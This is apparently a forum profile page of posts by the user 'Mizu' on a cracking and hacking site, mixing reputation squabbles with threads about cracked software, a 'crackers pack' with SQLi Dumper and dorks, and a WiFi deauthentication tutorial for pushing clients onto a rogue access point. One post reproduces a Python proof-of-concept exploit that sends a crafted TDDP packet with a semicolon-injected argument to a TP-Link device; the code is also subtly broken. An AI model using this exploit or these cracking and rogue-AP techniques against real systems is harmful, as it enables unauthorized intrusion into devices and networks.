
Mizu
Members-
Content Count
97 -
Last visited
Content Type
Profiles
Forums
Calendar
Gallery
Blogs
Store
Articles
Downloads
Classifieds
Everything posted by Mizu
-
cracked [EXCLU] [LATEST] ForceCop 1.1.2 - Most Advanced Supreme Bot
Mizu replied to Mizu's topic in Cracked Programs
Now the link is up ! -
So -rep for nothing is also stupid ;)
-
We foolishly did both: you for giving a bad rep for nothing and me for revenge in the SB. The context is what it is. Now I learned the lesson. We will never be friends but for me, all hellish childishness has no place to be. imagine being so nolife you care about having a red number, Lmao dude you're sad. watch your rep in the next 10 hrs Logic for my rep now but before that was not. Not no life, but i have some rules. P.S : You are "Cool Gamer" ?
-
We foolishly did both: you for giving a bad rep for nothing and me for revenge in the SB. The context is what it is. Now I learned the lesson. We will never be friends but for me, all hellish childishness has no place to be.
-
OUTDATED THREAD !
-
release -New Chrome Extension for Amazon Affiliates-
Mizu replied to longmango's topic in Monetizing Techniques
What kind of services ? Edit : Simple but useful -
Teaching what ? Hello ;) Whatever i learn lol I can teach yall how to make some tacos Good idea but now, i'm hungry ^^'
-
So like it ;)
-
OUTDATED THREAD !
-
Goodjob thank you I needed it :)
-
Full Crackers Pack : Tools / Configs / SQLi Dumper / Dorks Gen / Proxies
Mizu replied to Chimaera's topic in Cracking Tools
For Cracking or Reverse Engineering ;) -
So like the topic
-
Many and many. Do not forget to like the post.
-
You're welcome. I will share more when finish my last tool.
-
I'm curious to see your method ;)
-
Want more Paid Udemy Courses for free ?
-
Source : https://mjg59.dreamwidth.org/51672.html Exploit : #!/usr/bin/python3 # Copyright 2019 Google LLC. # SPDX-License-Identifier: Apache-2.0 # # Execute script as poc.py remoteaddr filename import binascii import socket port_send = 1040 port_receive = 61000 tddp_ver = "01" tddp_command = "31" tddp_req = "01" tddp_reply = "00" tddp_padding = "%0.16X" % 00 tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding]) sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock_receive.bind(('', port_receive)) # Send a request sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) packet = binascii.unhexlify(tddp_packet) argument = "%s;arbitrary" % sys.argv[2] packet = packet + argument.encode() sock_send.sendto(packet, (sys.argv[1], port_send)) sock_send.close() response, addr = sock_receive.recvfrom(1024) r = response.encode('hex') print(r)
-
Your sentence is just stupid :') Why is it stupid? if it's already been pre-installed on some linux OS's wouldn't that be easier for some people to use it? :kappa: It is the turn of the sentence that does not make sense; because airmon always worked mostly under linux so ... No need to take the lead for a sentence but the turn is downright strange
-
The sentence is not clear then :p ? what is your problem? if you can't understand it just shut up please. Your sentence is just stupid :')
-
Wifi Deauthentification - Deauth Clients to force switch to RogueAP
Mizu replied to Mizu's topic in Hacking Tutorials
This is a bump -
VirtualBox - Use any Operating System on your system
Mizu replied to Mizu's topic in Hacking Tutorials
This is a bump